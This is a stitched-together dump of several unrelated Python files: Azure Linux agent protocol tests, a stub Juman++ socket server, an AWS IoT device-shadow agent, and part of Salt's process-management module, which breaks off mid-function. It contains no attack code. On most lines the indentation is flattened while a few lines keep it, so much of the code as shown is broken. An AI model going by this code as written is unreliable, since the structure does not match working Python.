def test_detect_protocol_no_dhcp(self, WireProtocol, mock_get_lib_dir, _):
WireProtocol.return_value.detect = Mock()
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.osutil.is_dhcp_available.return_value = False
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = None
protocol_util.dhcp_handler.run = Mock()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path()
# Test wire protocol when no endpoint file has been written
protocol_util._detect_protocol()
self.assertEqual(KNOWN_WIRESERVER_IP, protocol_util.get_wireserver_endpoint())
# Test wire protocol on dhcp failure
protocol_util.osutil.is_dhcp_available.return_value = True
protocol_util.dhcp_handler.run.side_effect = DhcpError()
self.assertRaises(ProtocolError, protocol_util._detect_protocol)
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_get_protocol(self, WireProtocol, _):
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.get_wireserver_endpoint = Mock()
protocol_util._detect_protocol = MagicMock()
protocol_util._save_protocol("WireProtocol")
protocol = protocol_util.get_protocol()
        self.assertEqual(WireProtocol.return_value, protocol)
protocol_util.get_wireserver_endpoint.assert_any_call()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
def test_get_protocol_wireserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from WireServer to WireServer protocol
will clean up leftover MDS Certificates (from a previous Metadata Server to Wireserver
update, intermediate updated agent does not clean up MDS certificates) and reset firewall rules.
We don't test that WireServer certificates, protocol file, or endpoint file were created
because we already expect them to be created since we are updating from a WireServer agent.
"""
# Setup Protocol file with WireProtocol
dir = tempfile.gettempdir()
filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(filename, "w") as f:
f.write(WIRE_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_rules_files.assert_called_once()
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_metadataserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from MetadataServer to WireServer protocol
will clean up leftover MDS Certificates and reset firewall rules. Also check that
WireServer certificates are present, and protocol/endpoint files are written to appropriately.
"""
# Setup Protocol file with MetadataProtocol
dir = tempfile.gettempdir()
protocol_filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(protocol_filename, "w") as f:
f.write(_METADATA_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_rules_files.assert_called_once()
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f:
            self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
        # Check Endpoint file is updated to WireServer IP
        with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f:
            self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_new_wireserver_agent_generates_certificates(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that a new WireServer Linux Agent generates appropriate certificates,
protocol file, and endpoint file.
"""
# Setup mocks
dir = tempfile.gettempdir()
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules were not reset
protocol_util.osutil.remove_rules_files.assert_not_called()
protocol_util.osutil.remove_firewall.assert_not_called()
protocol_util.osutil.enable_firewall.assert_not_called()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f:
            self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
        # Check Endpoint file is updated to WireServer IP
        with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f:
            self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch("azurelinuxagent.common.utils.fileutil")
@patch("azurelinuxagent.common.conf.get_lib_dir")
def test_endpoint_file_states(self, mock_get_lib_dir, mock_fileutil, _):
mock_get_lib_dir.return_value = self.tmp_dir
mock_fileutil = MagicMock()
protocol_util = get_protocol_util()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path()
# Test get endpoint for io error
mock_fileutil.read_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint()
        self.assertEqual(ep, KNOWN_WIRESERVER_IP)
        # Test get endpoint when file not found
        mock_fileutil.read_file.side_effect = IOError(ENOENT, 'File not found')
        ep = protocol_util.get_wireserver_endpoint()
        self.assertEqual(ep, KNOWN_WIRESERVER_IP)
        # Test get endpoint for empty file
        mock_fileutil.read_file.return_value = ""
        ep = protocol_util.get_wireserver_endpoint()
        self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test set endpoint for io error
mock_fileutil.write_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint()
        self.assertRaises(OSUtilError, protocol_util._set_wireserver_endpoint, 'abc')
# Test clear endpoint for io error
with open(endpoint_file, "w+") as ep_fd:
ep_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util._clear_wireserver_endpoint()
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(endpoint_file, mock_remove.call_args_list[0][0][0])
# Test clear endpoint when file not found
with patch('os.remove') as mock_remove:
            mock_remove.side_effect = IOError(ENOENT, 'File not found')
            protocol_util._clear_wireserver_endpoint()
            self.assertEqual(1, mock_remove.call_count)
def test_protocol_file_states(self, _):
protocol_util = get_protocol_util()
protocol_util._clear_wireserver_endpoint = Mock()
protocol_file = protocol_util._get_protocol_file_path()
# Test clear protocol for io error
with open(protocol_file, "w+") as proto_fd:
proto_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count)
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
# Test clear protocol when file not found
protocol_util._clear_wireserver_endpoint.reset_mock()
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count)
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
if __name__ == '__main__':
unittest.main()
|
jumanpp.py
|
import argparse
import logging
import socketserver
import subprocess
from multiprocessing import Process
def main():
logger = logging.getLogger(__name__)
parser = _mk_argparser(logger=logger)
    args = parser.parse_args()
def _mk_argparser(*, logger=None):
logger = logger or logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="Server mode of juman++")
parser.add_argument('-c', '--cmd',
action='store',
default='jumanpp',
type=str,
help='which jumanpp cmd')
    parser.add_argument('-p', '--port',
action='store',
default=12000,
type=int,
help='port number to open')
return parser
class ExecuteDaemon:
def __init__(self, cmdl, *, logger=None, **prs_args):
self.cmdl = cmdl
self.prs_args = prs_args
self.logger = logger or logging.getLogger("ExecuteDaemon")
self.start()
def start(self):
        self.popen = subprocess.Popen(self.cmdl,
                                      encoding='utf-8',
                                      stdin=subprocess.PIPE,
                                      stdout=subprocess.PIPE,
                                      **self.prs_args)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.popen.stdin.close()
def receive(self):
self.popen.stdout.flush()
return self.popen.stdout.read()
class JumanppRequestHandler(socketserver.StreamRequestHandler):
def __init__(self, request, client_address, server, *, logger=None):
self._logger = logging.getLogger('JumanppRequestHandler')
self._logger.debug('__init__')
super().__init__(request, client_address, server)
def setup(self):
self._logger.debug('setup')
return super().setup()
def handle(self):
self._logger.debug('handle')
data = self.rfile.readline()
self._logger.debug('recv()->"%s"', data)
self.request.send(data)
def finish(self):
self._logger.debug('finish')
return super().finish()
def _jumanpp_process():
pass
class JumanppServer(socketserver.ForkingMixIn, socketserver.TCPServer):
"""
Juman++のサーバとして動作するクラス
"""
def __init__(self, server_address, handler_class, *, logger=None):
        self._logger = logger or logging.getLogger('JumanppServer')
self._logger.debug('init')
super().__init__(server_address, handler_class)
self._logger.info('started jumanpp server')
def server_activate(self):
self._logger.info('server activated')
super().server_activate()
def serve_forever(self):
self._logger.debug('waiting for request')
self._logger.info('Handling requests, press <Ctrl-C> to quit')
while True:
self.handle_request()
return
def handle_request(self):
self._logger.debug('handle_request')
return super().handle_request()
def verify_request(self, request, client_address):
self._logger.debug('verify_request(%s, %s)', request, client_address)
return super().verify_request(request, client_address)
def process_request(self, request, client_address):
self._logger.debug('process_request(%s, %s)', request, client_address)
return super().process_request(request, client_address)
def server_close(self):
self._logger.debug('server_close')
return super().server_close()
def finish_request(self, request, client_address):
self._logger.debug('finish_request(%s, %s)', request, client_address)
return super().finish_request(request, client_address)
def close_request(self, request_address):
self._logger.debug('close_request(%s)', request_address)
return super().close_request(request_address)
def test():
import socket
import threading
import os
    address = ('localhost', 0)  # let the kernel assign a port number
    server = JumanppServer(address, JumanppRequestHandler)
    ip, port = server.server_address  # find out which port was assigned
    t = threading.Thread(target=server.serve_forever)
    t.daemon = True  # don't hang on exit
    t.start()
    print('Server loop running in process:', os.getpid())
    # connect to the server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    # send data
    message = 'Hello, world'
    print('Sending : "%s"' % message)
    len_sent = s.send(message.encode())
    # receive the response
    response = s.recv(1024)
    print('Received: "%s"' % response)
    # clean up
    s.close()
    server.socket.close()
|
duploiotagent.py
|
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import logging
import time
import sys
import traceback
import argparse
import os
import json
import requests
import socket
import boto3
import datetime
from threading import Thread
import basicPubSub
from dockerutils import processGoalState
from dockerutils import getContainersJson
g_deviceid = ""
def invokePubSub():
global g_deviceid
    while True:
try:
lAwsMQTTClient, ltopic, g_deviceid = basicPubSub.pubSubGetClient()
print("++++++++ Device ID is {}".format(g_deviceid))
basicPubSub.startPubSub(lAwsMQTTClient, ltopic)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('pubsub threw an error {}'.format(el))
time.sleep(10)
def getDeviceShadow():
global g_deviceid
try:
client = boto3.client('iot-data', region_name='us-west-2')
response = client.get_thing_shadow(thingName=g_deviceid)
streamingBody = response["payload"]
data = json.loads(streamingBody.read())
#formattedData = json.dumps(data["state"]["desired"], indent=4, sort_keys=True)
#print(formattedData)
processGoalState(data["state"]["desired"])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('getDeviceShadow threw an error {}'.format(el))
def updateDeviceShadow():
global g_deviceid
try:
lData = getContainersJson()
lJsonObj = json.loads(lData)
lHostName = os.getenv('HOST_HOSTNAME', socket.gethostname())
d = datetime.datetime.utcnow()
status = '{ "ReportedAt":"' + d.isoformat() + '", "Containers":' + json.dumps(lJsonObj) + ' }'
status = '{ "reported":' + status + ' }'
status = '{ "state":' + status + ' }'
lJsonObj = json.loads(status)
print(json.dumps(lJsonObj))
client = boto3.client('iot-data', region_name='us-west-2')
response = client.update_thing_shadow(thingName=g_deviceid, payload=json.dumps(lJsonObj))
print('Updated Device Shadow')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
el = repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print('updateDeviceShadow threw an error {}'.format(el))
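# Note (illustrative sketch, not part of the original file): the shadow
# document above is assembled by string concatenation, which breaks if any
# value needs JSON escaping. An equivalent, safer construction using plain
# dicts would be:
#
#     containers = json.loads(getContainersJson())
#     payload = {'state': {'reported': {
#         'ReportedAt': datetime.datetime.utcnow().isoformat(),
#         'Containers': containers,
#     }}}
#     client.update_thing_shadow(thingName=g_deviceid,
#                                payload=json.dumps(payload))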
if __name__ == '__main__':
print('Launching pubsub thread')
    lPubSubthrd = Thread(target=invokePubSub, args=[])
    lPubSubthrd.daemon = True
    lPubSubthrd.start()
    while True:
time.sleep(12)
print("++++++++ Device ID is {}".format(g_deviceid))
getDeviceShadow()
print("++++++++ Device ID is {}".format(g_deviceid))
updateDeviceShadow()
|
process.py
|
# -*- coding: utf-8 -*-
'''
Functions for daemonizing and otherwise modifying running processes
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
import socket
# Import salt libs
import salt.defaults.exitcodes
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
def appendproctitle(name):
'''
Append "name" to the current process title
'''
if HAS_SETPROCTITLE:
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + name)
def daemonize(redirect_out=True):
'''
Daemonize a process
'''
# Avoid circular import
import salt.utils.crypt
try:
pid = os.fork()
if pid > 0:
# exit first parent
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error('fork #1 failed: %s (%s)', exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir('/')
# noinspection PyArgumentList
os.setsid()
    os.umask(0o022)
# do second fork
try:
pid = os.fork()
if pid > 0:
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error('fork #2 failed: %s (%s)', exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
salt.utils.crypt.reinit_crypto()
# A normal daemonization redirects the process output to /dev/null.
# Unfortunately when a python multiprocess is called the output is
# not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with salt.utils.files.fopen('/dev/null', 'r+') as dev_null:
# Redirect python stdin/out/err
# and the os stdin/out/err which can be different
os.dup2(dev_null.fileno(), sys.stdin.fileno())
os.dup2(dev_null.fileno(), sys.stdout.fileno())
os.dup2(dev_null.fileno(), sys.stderr.fileno())
os.dup2(dev_null.fileno(), 0)
os.dup2(dev_null.fileno(), 1)
os.dup2(dev_null.fileno(), 2)
def daemonize_if(opts):
'''
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
'''
if 'salt-call' in sys.argv[0]:
return
if not opts.get('multiprocessing', True):
return
if sys.platform.startswith('win'):
return
daemonize(False)
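# Illustrative usage sketch (not part of the original module): a module
# function that may run in its own process calls daemonize_if() with the
# opts dict before doing long-running work; it is a no-op under salt-call,
# on Windows, or when 'multiprocessing' is disabled in opts.
#
#     opts = {'multiprocessing': True}
#     daemonize_if(opts)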
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.path.which('systemd-notify') \
and systemd_notify_call('--booted'):
# Notify systemd synchronously
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
# Handle abstract namespace socket
if notify_socket.startswith('@'):
notify_socket = '\0{0}'.format(notify_socket[1:])
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.connect(notify_socket)
sock.sendall('READY=1'.encode())
sock.close()
except socket.error:
return systemd_notify_call('--ready')
return True
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.files.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid())) # future lint: disable=blacklisted-function
except IOError:
pass
log.debug('Created pidfile: %s', pidfile)
if salt.utils.platform.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('%s Traceback follows:', msg, exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: %s to user: %s', pidfile, user)
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
try:
with salt.utils.files.fopen(pidfile) as pdf:
pid = pdf.read().strip()
return int(pid)
except (OSError, IOError, TypeError, ValueError):
return None
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error('Process did not die with terminate(): %s', proc.pid)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
    Since there isn't much use for this class as of right now, this
    implementation only supports daemonized threads and will *not* return
    results.
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
                # During shutdown, `queue` may not have an `Empty` attribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug(
'ThreadPool executing func: %s with args=%s kwargs=%s',
func, args, kwargs
)
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
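# Illustrative usage sketch (not part of the original module): fire_async()
# enqueues work for the daemonized workers without tracking results, and
# returns False when the bounded queue is full so callers can apply
# backpressure.
#
#     pool = ThreadPool(num_threads=4, queue_size=100)
#     if not pool.fire_async(log.debug, args=['work item accepted']):
#         pass  # queue full: retry later or drop the task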
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
        Create a process from tgt with args + kwargs.
        This will determine if tgt is a Process class; otherwise it assumes
        it is a function.
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.platform.is_windows():
# Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if six.text_type(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '%s' with pid %s", name, process.pid)
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info(
'Process %s (%s) died with exit status %s, restarting...',
self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode
)
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.platform.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
    def run(self, asynchronous=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
                if asynchronous:
yield gen.sleep(10)
else:
time.sleep(10)
if len(self._process_map) == 0:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
log.trace('Process restart of %s', pid)
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# first lets reset signal handlers to default one to prevent running this twice
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.platform.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.files.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', six.text_type(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid %s: %s', pid, p_map['Process'])
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid %s: %s', pid, p_map['Process'])
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid %s: %s', pid, p_map['Process'])
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for # pylint: disable=str-format-in-logging
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for # pylint: disable=str-format-in-logging
(k, v) in self._process_map.items()
)
)
log.warning(
